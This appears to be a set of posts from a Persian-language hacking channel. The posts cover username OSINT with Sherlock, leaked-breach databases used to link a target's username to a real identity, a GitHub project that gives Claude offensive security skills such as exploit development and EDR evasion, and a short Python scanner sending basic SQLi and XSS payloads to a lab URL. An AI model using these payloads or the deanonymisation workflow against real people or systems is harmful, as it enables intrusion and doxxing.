بعد با استفاده از UserNameFinder های مختلف میتونید در مورد اکانت هدفتون اطلاعات بیشتری بدست بیارید که این یوزرنیم کجا ها به کار رفته ! و ایا اطلاعات بیشتری میشه ازش پیدا کرد یا که نه مثل ایمیل و . . .
ابزار استفاده شده Sherlock
Code Block
با اسفاده از سایت های زیر میتونید چک کنید که این UserName چیزی ازش در دیتابیس های هک شده وجود داره یا نه ؟چرا که تنها یک ایمیل میتونه شمارو به هویت کامل اون شخص برسونه 👇️️
http://haveibeenpwned.com
http://dehashed.com
http://intelx.io
http://leakcheck.io
http://snusbase.com
Code Block
این که این همه اطلاعات سبز پیدا کنید اصلا مهم نیست و هیچ گونه آنالیزی اینجا صورت نمیگیره !در واقع با باز کردن تک تک اکانت ها و بررسی پست ها و . . . شما تازه میفهمید که ایا این اکانت مربوط به هدفتون هست یا نه ! اینجا تازه آنالیز شروع میشه که از UserName بتونید برسید به اسم و فامیل و . . .
Code Block
باید بری سمتش تا بتونی اینطوری باگ بزنی، و ۱۰ هزار دلار یهو تو جیبت باشه ! (البته بعد از مالیات و ... اگه شاملش بشه ) و خلاقیت و چاشنی کارت کنی
Code Block
این روش یادگیریه این حوزه باید بری سمتش ! یادش بگیری ! عملی انجامش بدی و از همه مهتر بچه ها خلاقیت ! حرف اول و میزنه
Code Block
میخوام یه ویدیو آموزشی براتون آپلود کنم
آموزش proxychains4 پروکسیکردن هر برنامهای تو لینوکس
ایتا نمیزاره 💔
با این پروژه گیت هاب میتونید Calude رو به یک هkر حرفه ای در کنار خودتون تبدیل کنید ! 👇🏻
https://github.com/SnailSploit/Claude-Red
یه پروژه جالب به اسم Claude-Red پیدا کردم که به Claude کلی Skill تخصصی امنیتی میده؛ از SQL Injection و XSS گرفته تا Exploit Development، EDR Evasion، Active Directory و حتی Kubernetes
نکته جذابش اینه که اینا اسکریپتهای آماده نیستن؛ هر Skill یه فایل SKILL.mdـه که به Claude یاد میده چه زمانی، چه تکنیکی و با چه روشی دنبال آسیبپذیری بگرده.
یعنی بهجای اینکه فقط بگی:
«این سایت رو بررسی کن»
Claude با Skill مناسب میتونه مثل یه متخصص امنیتی به موضوع نگاه کنه 🧠⚡️
برای Red Team، Bug Bounty، CTF و Security Research واقعاً پروژه جذابیه
Code Block
یک قطعه کد ساده پایتونی که به شما کمک میکنه طریقه عملکرد اسکنر های اسیب پذیری رو بهتر درک کنید 👇🏻
در این قطعه کد اسب پذیری های XSS و Sqli تست میشن .
import requests
import re
import threading
url = "http://python.scanner/labs/greetings.php?id="
payloads = {
"SQLi": ["'", "' OR '1'='1", "\" OR \"1\"=\"1", "'; --", "' UNION SELECT 1,2,3 --"],
"XSS": ["<script>alert('XSS')</script>", "'><img src=x onerror=alert('XSS')>"]
}
sqli_errors = [
"SQL syntax","SQLite3::query():", "MySQL server", "syntax error", "Unclosed quotation mark", "near 'SELECT'",
"Unknown column", "Warning: mysql_fetch", "Fatal error"
]
def scan_payload(vuln_type, payload):
response = requests.get(url, params={"id": payload})
content = response.text.lower()
if vuln_type == "SQLi" and any(error.lower() in content for error in sqli_errors):
print(f"[+] Potential SQL injection detected with payload: {payload}")
elif vuln_type == "XSS" and payload.lower() in content:
print(f"[+] Potential XSS detected with payload: {payload}")
threads = []
for vuln, tests in payloads.items():
for payload in tests:
t = threading.Thread(target=scan_payload, args=(vuln, payload))
threads.append(t)
t.start()
# Wait for all threads to finish
for t in threads:
t.join()
Code Block
چطوری میشه هر کمپانی ای رو Hک کرد !؟
اگر برای شما هم سوال هست که با علمی که دارید چطوری میشه یک جایی رو هک کرد. بهتره که از این مطلب استفاده کنید . اگر علمی ندارید و میخواین یاد بگیرید اینجا کلیک کنید⬇️
⬅️ دانلود آموزش
Code Block